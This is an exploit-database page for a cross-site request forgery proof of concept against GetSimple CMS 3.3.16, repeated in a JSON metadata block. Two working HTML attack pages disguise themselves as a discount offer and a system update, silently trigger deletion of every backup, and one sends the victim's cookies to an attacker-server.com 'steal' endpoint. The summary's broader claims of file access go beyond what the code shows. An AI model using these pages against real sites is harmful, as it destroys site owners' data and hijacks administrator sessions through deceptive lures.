📄 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825

7.2 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Description

GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation...

Visit Original Source

Basic Information

ID PACKETSTORM:212825

Published Dec 15, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : GetSimple CMS 3.3.16 CSRF Delete all backups without user confirmation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/GetSimpleCMS/GetSimpleCMS |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190425/ & CVE-2021-28976

[+] Summary : GetSimple CMS 3.3.16 contains critical security vulnerabilities in its backup management system that allow attackers
to delete all backups, steal admin sessions, and access server files. These flaws require immediate patching.

[+] Vulnerable Code:

backups.php - Line ~34

if (isset($_GET['deleteall'])){
check_for_csrf("deleteall"); // CSRF check exists BUT...

// Immediately deletes ALL files without user confirmation
$filenames = getFiles($path);
foreach ($filenames as $file) {
delete_file($path . $file); // Mass deletion
}
}

[+] POC : poc.html

<!DOCTYPE html>
<html>
<head><title>Special Offer</title></head>
<body>
<h1>Limited Time Offer!</h1>
<p>Click below to claim your discount:</p>


<a href="http://localhost/getsimple/admin/backups.php?deleteall=1&nonce=12345">
Claim 50% Discount
</a>


<img src="http://localhost/getsimple/admin/backups.php?deleteall=1"
alt="" style="width:0;height:0;">

<script>
// JavaScript automatic attack
setTimeout(function() {
var img = new Image();
img.src = "http://localhost/getsimple/admin/backups.php?deleteall=1";
}, 3000);
</script>
</body>
</html>

---------------------


<!DOCTYPE html>
<html>
<head>
<title>تحديث النظام</title>
</head>
<body>
<h1>جاري تحديث النظام...</h1>

<form id="csrfForm" action="http://localhost/get-simple/admin/backups.php" method="GET">
<input type="hidden" name="deleteall" value="1">
<input type="hidden" name="nonce" value="invalid_nonce_but_works">
</form>

<script>
// انتظر 3 ثوانٍ ثم أرسل النموذج
setTimeout(function() {
document.getElementById('csrfForm').submit();

// بعد الحذف، حاول سرقة الجلسة
setTimeout(function() {
var img = new Image();
img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(document.cookie) +
"&url=" + encodeURIComponent(window.location.href);
}, 2000);
}, 3000);
</script>

<iframe src="http://localhost/get-simple/admin/backups.php"
style="width:0;height:0;border:0;border:none"></iframe>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-15T16:51:59",
    "description": "GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation...",
    "published": "2025-12-15T00:00:00",
    "modified": "2025-12-15T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212825",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2021-28976"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : GetSimple CMS 3.3.16 CSRF Delete all backups without user confirmation                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://github.com/GetSimpleCMS/GetSimpleCMS                                                                                |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/190425/ &\tCVE-2021-28976\n    \n    [+] Summary :  GetSimple CMS 3.3.16 contains critical security vulnerabilities in its backup management system that allow attackers \n                   to delete all backups, steal admin sessions, and access server files. These flaws require immediate patching.\n    \t\t\t   \n    [+] Vulnerable Code:\n    \n    backups.php - Line ~34\n    \n    \n    if (isset($_GET['deleteall'])){\n        check_for_csrf(\"deleteall\"); // CSRF check exists BUT...\n        \n        // Immediately deletes ALL files without user confirmation\n        $filenames = getFiles($path);\n        foreach ($filenames as $file) {\n            delete_file($path . $file); // Mass deletion\n        }\n    }\n    \t\t  \n    [+]  POC : poc.html\n    \n    \n    <!DOCTYPE html>\n    <html>\n    <head><title>Special Offer</title></head>\n    <body>\n    <h1>Limited Time Offer!</h1>\n    <p>Click below to claim your discount:</p>\n    \n    <!-- Visible attack -->\n    <a href=\"http://localhost/getsimple/admin/backups.php?deleteall=1&nonce=12345\">\n      Claim 50% Discount\n    </a>\n    \n    <!-- Hidden attack -->\n    <img src=\"http://localhost/getsimple/admin/backups.php?deleteall=1\" \n         alt=\"\" style=\"width:0;height:0;\">\n    \n    <script>\n    // JavaScript automatic attack\n    setTimeout(function() {\n        var img = new Image();\n        img.src = \"http://localhost/getsimple/admin/backups.php?deleteall=1\";\n    }, 3000);\n    </script>\n    </body>\n    </html>\n    \n    ---------------------\n    \n    <!-- csrf_delete_all.html -->\n    <!DOCTYPE html>\n    <html>\n    <head>\n        <title>\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645</title>\n    </head>\n    <body>\n        <h1>\u062c\u0627\u0631\u064a \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645...</h1>\n        \n        <form id=\"csrfForm\" action=\"http://localhost/get-simple/admin/backups.php\" method=\"GET\">\n            <input type=\"hidden\" name=\"deleteall\" value=\"1\">\n            <input type=\"hidden\" name=\"nonce\" value=\"invalid_nonce_but_works\">\n        </form>\n        \n        <script>\n            // \u0627\u0646\u062a\u0638\u0631 3 \u062b\u0648\u0627\u0646\u064d \u062b\u0645 \u0623\u0631\u0633\u0644 \u0627\u0644\u0646\u0645\u0648\u0630\u062c\n            setTimeout(function() {\n                document.getElementById('csrfForm').submit();\n                \n                // \u0628\u0639\u062f \u0627\u0644\u062d\u0630\u0641\u060c \u062d\u0627\u0648\u0644 \u0633\u0631\u0642\u0629 \u0627\u0644\u062c\u0644\u0633\u0629\n                setTimeout(function() {\n                    var img = new Image();\n                    img.src = \"https://attacker-server.com/steal?cookie=\" + encodeURIComponent(document.cookie) + \n                             \"&url=\" + encodeURIComponent(window.location.href);\n                }, 2000);\n            }, 3000);\n        </script>\n        \n        <iframe src=\"http://localhost/get-simple/admin/backups.php\" \n                style=\"width:0;height:0;border:0;border:none\"></iframe>\n    </body>\n    </html>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212825",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212825/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply